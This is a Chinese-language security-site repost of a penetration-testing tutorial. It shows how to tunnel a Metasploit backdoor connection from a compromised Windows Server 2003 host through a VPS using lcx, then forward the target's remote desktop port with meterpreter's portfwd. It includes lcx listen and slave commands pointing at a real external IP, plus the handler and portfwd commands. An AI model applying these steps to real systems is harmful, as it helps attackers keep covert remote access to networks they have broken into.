未加星标

使用 Msf 和 lcx 进行 Port Tunnel

字体大小 | |
[web安全 所属分类 web安全 | 发布者 店小二04 | 时间 2017 | 作者 红领巾 ] 0人收藏点击收藏

本文《使用 Msf 和 lcx 进行 Port Tunnel》由armyzer0团队原创投稿安全脉搏,安全脉搏独家发表本文,如需要转载,请先联系安全脉搏授权;未经授权请勿转载。

使用Msf lcx 进行Port Tunnel
使用 Msf 和 lcx 进行 Port Tunnel

连接示意图

VPS 服务器上用lcx 工具进行端口监听

lcx -listen 5353 3535


使用 Msf 和 lcx 进行 Port Tunnel

 

Attack Target (windows Server 2003) 服务器上运行Msf后门并用lcx 工具进行端口转发

 

Windows Server 2003 网络配置


使用 Msf 和 lcx 进行 Port Tunnel

使用 Msf 和 lcx 进行 Port Tunnel

 

运行Msf 后门程序


使用 Msf 和 lcx 进行 Port Tunnel

 

运行lcx 工具链接VPS 服务器进行本地端口转发

lcx -slave 172.87.24.247 5353 127.0.0.1 9009

 


使用 Msf 和 lcx 进行 Port Tunnel

使用 Msf 和 lcx 进行 Port Tunnel

(VPS 上可看到来自Attack Target 的网络连接)

 

BackBox 上启动msfconsole 进行后门链接

Backbox 网络配置


使用 Msf 和 lcx 进行 Port Tunnel

启动msfconsole 加载exploit/multi/handler


使用 Msf 和 lcx 进行 Port Tunnel

使用 Msf 和 lcx 进行 Port Tunnel

 

Msf 终端下执行run 命令启动链接


使用 Msf 和 lcx 进行 Port Tunnel
Meterpreter 内网端口转发

Portfwd命令简单端口转发(本地3389 远程桌面转发)


使用 Msf 和 lcx 进行 Port Tunnel

 

Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

-L <opt> The local host to listen on (optional).

-h Help banner.

-l <opt> The local port to listen on.

-p <opt> The remote port to connect to.

-r <opt> The remote host to connect to.

-L 选项指定本地监听的主机(即Backbox 主机,可简单指定为:0.0.0.0)

-l 选项指定本地监听的端口(即Backbox 主机监听的端口,可简单指定为:3389)

-p 选项指定远程主机要转发的端口(例如Attack Target(Windows Server 2003)上的3389 端口)

-r 选项制定远程主机网络地址(例如Attack Target(Windows Server 2003) 的127.0.0.1)


使用 Msf 和 lcx 进行 Port Tunnel

转发远程主机3389 进行远程桌面链接

 

Portfwd add -L 0.0.0.0 -l 3389 -r 127.0.0.1 -p 3389


使用 Msf 和 lcx 进行 Port Tunnel

连接Backbox 主机的3389 端口

 


使用 Msf 和 lcx 进行 Port Tunnel

使用 Msf 和 lcx 进行 Port Tunnel

行文至末,属于比较详细的图文记录档案,可作为参考备用,欢迎不断查阅。

本文《使用 Msf 和 lcx 进行 Port Tunnel》由armyzer0团队原创投稿安全脉搏,安全脉搏独家发表本文,如需要转载,请先联系安全脉搏授权;未经授权请勿转载。

本文web安全相关术语:黑盒测试方法 黑盒测试和白盒测试 网站安全检测 360网站安全检测 网络安全知识 网络安全技术 网络信息安全 网络安全工程师

分页:12
转载请注明
本文标题:使用 Msf 和 lcx 进行 Port Tunnel
本站链接:http://www.codesec.net/view/531043.html
分享请点击:


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | web安全 | 评论(0) | 阅读(297)